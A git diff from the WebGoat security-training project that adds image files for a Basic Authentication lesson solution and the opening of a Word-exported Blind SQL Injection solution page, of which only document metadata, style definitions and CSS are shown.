diff --git a/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image013.png b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image013.png
new file mode 100644
index 000000000..f66852324
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image013.png differ
diff --git a/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image015.png b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image015.png
new file mode 100644
index 000000000..d167a7f35
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image015.png differ
diff --git a/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image017.png b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image017.png
new file mode 100644
index 000000000..9139ad257
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image017.png differ
diff --git a/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image019.png b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image019.png
new file mode 100644
index 000000000..f8604adae
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image019.png differ
diff --git a/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image021.png b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image021.png
new file mode 100644
index 000000000..5788c8d43
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image021.png differ
diff --git a/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image023.png b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image023.png
new file mode 100644
index 000000000..368d0d456
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image023.png differ
diff --git a/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image025.jpg b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image025.jpg
new file mode 100644
index 000000000..b1aeffb19
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image025.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image026.jpg b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image026.jpg
new file mode 100644
index 000000000..8addcb872
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image026.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image027.jpg b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image027.jpg
new file mode 100644
index 000000000..0245a850c
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image027.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image028.jpg b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image028.jpg
new file mode 100644
index 000000000..9e6b65ff8
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image028.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image029.jpg b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image029.jpg
new file mode 100644
index 000000000..3586cede5
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image029.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image030.jpg b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image030.jpg
new file mode 100644
index 000000000..cdc430d9b
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image030.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image031.jpg b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image031.jpg
new file mode 100644
index 000000000..e9bb7a278
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image031.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image032.jpg b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image032.jpg
new file mode 100644
index 000000000..b4e1f851a
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image032.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image033.jpg b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image033.jpg
new file mode 100644
index 000000000..468293b14
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image033.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image034.jpg b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image034.jpg
new file mode 100644
index 000000000..3a463c317
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image034.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image035.jpg b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image035.jpg
new file mode 100644
index 000000000..32f9278c2
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image035.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image036.jpg b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image036.jpg
new file mode 100644
index 000000000..1ab696dcd
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image036.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/BasicAuthentication_files/themedata.thmx b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/BlindSqlInjection.html b/main/project/WebContent/lesson_solutions/BlindSqlInjection.html
new file mode 100644
index 000000000..44fbeb577
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/BlindSqlInjection.html
@@ -0,0 +1,904 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/BlindSqlInjection_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/BlindSqlInjection_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>3</o:Revision>
+  <o:TotalTime>35</o:TotalTime>
+  <o:Created>2007-07-11T11:06:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:25:00Z</o:LastSaved>
+  <o:Pages>3</o:Pages>
+  <o:Words>622</o:Words>
+  <o:Characters>3547</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>29</o:Lines>
+  <o:Paragraphs>8</o:Paragraphs>
+  <o:CharactersWithSpaces>4161</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/BlindSqlInjection_files/themedata.thmx">
+<link rel=colorSchemeMapping
+href="/WebGoat/lesson_solutions/BlindSqlInjection_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="0" Name="Normal (Web)"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:Wingdings;
+	panose-1:5 0 0 0 0 0 0 0 0 0;
+	mso-font-charset:2;
+	mso-generic-font-family:auto;
+	mso-font-pitch:variable;
+	mso-font-signature:0 268435456 0 0 -2147483648 0;}
+@font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+h2
+	{mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 2 Char";
+	mso-style-next:Normal;
+	margin-top:10.0pt;
+	margin-right:0cm;
+	margin-bottom:0cm;
+	margin-left:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan lines-together;
+	page-break-after:avoid;
+	mso-outline-level:2;
+	font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+a:link, span.MsoHyperlink
+	{mso-style-noshow:yes;
+	color:blue;
+	text-decoration:underline;
+	text-underline:single;}
